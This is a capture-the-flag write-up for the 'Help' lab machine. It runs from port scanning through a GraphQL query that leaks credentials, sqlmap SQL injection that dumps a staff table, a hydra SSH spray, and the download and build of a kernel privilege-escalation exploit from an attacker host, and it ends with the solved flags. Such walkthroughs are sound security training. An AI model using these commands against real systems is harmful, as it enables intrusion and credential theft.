Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.121 | TCP:22,80,3000 |
$ sudo masscan -p1-65535,U:1-65535 10.10.10.121 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')$ nmap -Pn -sV -sC -p$ports 10.10.10.121
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
HelpDeskZ
# echo '10.10.10.121 help.htb' >> /etc/hosts
$ dirsearch -u http://help.htb/
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图](https://img.4awl.net/img/50/70a152896d5fb9a76d385030c3910f.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图")
http://help.htb/support![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图1](https://img.4awl.net/img/8b/22f8a32d28f2005d74ff44337ffcfd.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图1")
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图2](https://img.4awl.net/img/e5/4af277d2fd66792f0231f6d9bec150.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图2")
NODE.JS && GraphQL 未授权访问
$ whatweb http://10.10.10.121:3000 -v![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图3](https://img.4awl.net/img/44/b38561e99158318a9a97aa4c25a568.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图3")
$ curl -s -G http://10.10.10.121:3000/graphql --data-urlencode "query={user}"
错误提示你需要用 { ... } 明确列出需要从 user 中获取的具体字段。
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图4](https://img.4awl.net/img/c2/22b29f697647c87a4bc17801b51333.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图4")
$ curl -s -G http://10.10.10.121:3000/graphql --data-urlencode "query={user{username,password}}"![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图5](https://img.4awl.net/img/9a/eb39e3c49cfb1fdd752b60c8effe39.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图5")
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图6](https://img.4awl.net/img/64/429ede98a3becddee440ab781a4f6d.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图6")
username:[email protected]password:godhelpmeplz
HelpDeskZ SQLI
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图7](https://img.4awl.net/img/38/b74ad9ce78395a95b436b440e983aa.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图7")
GET /support/?v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=1&param[]=10 HTTP/1.1
Host: help.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://help.htb/support/?v=view_tickets&action=ticket&param[]=8
Cookie: lang=english; PHPSESSID=ri7q0rqtnbcvmistdqr006vig1; usrhash=0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BGMn4sO7fCgec6Z%2FXLV%2BAwXfx35QvIDTO%2FSMYMFINSxIA%3D%3D
Upgrade-Insecure-Requests: 1
$ sqlmap -r target -p param[] --level 5 --risk 3 --batch
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图8](https://img.4awl.net/img/95/f8d3dea8a19824036a5ffdfd7ecaff.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图8")
$ sqlmap -r target -p param[] --level 5 --risk 3 --batch -D support -T staff --dump
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图9](https://img.4awl.net/img/0f/04ba74e3ec82a0711d114ab571ddcd.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图9")
$ hydra -L usernames -p Welcome1 ssh://10.10.10.121
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图10](https://img.4awl.net/img/01/b4011fdbef1164e361d70ee9b5ce50.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图10")
username:helppassword:Welcome1
$ ssh [email protected]![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图11](https://img.4awl.net/img/1c/8b0202c7fd7bce1ec90b86039b5340.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图11")
User.txt
ae3b7cd906a806d72bf78a3c751c2533
Privilege Escalation: Linux Kernel < 4.4.0-116
https://www.exploit-db.com/exploits/44298
$ wget http://10.10.16.13/ker.c
$ gcc ker.c -o ker
$ chmod +x ker
![[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图12](https://img.4awl.net/img/26/792ad77dcabd983844e0e72345403d.jpg "[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel插图12")
Root.txt
314e5296badc1deb6632c86af6298d1b
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
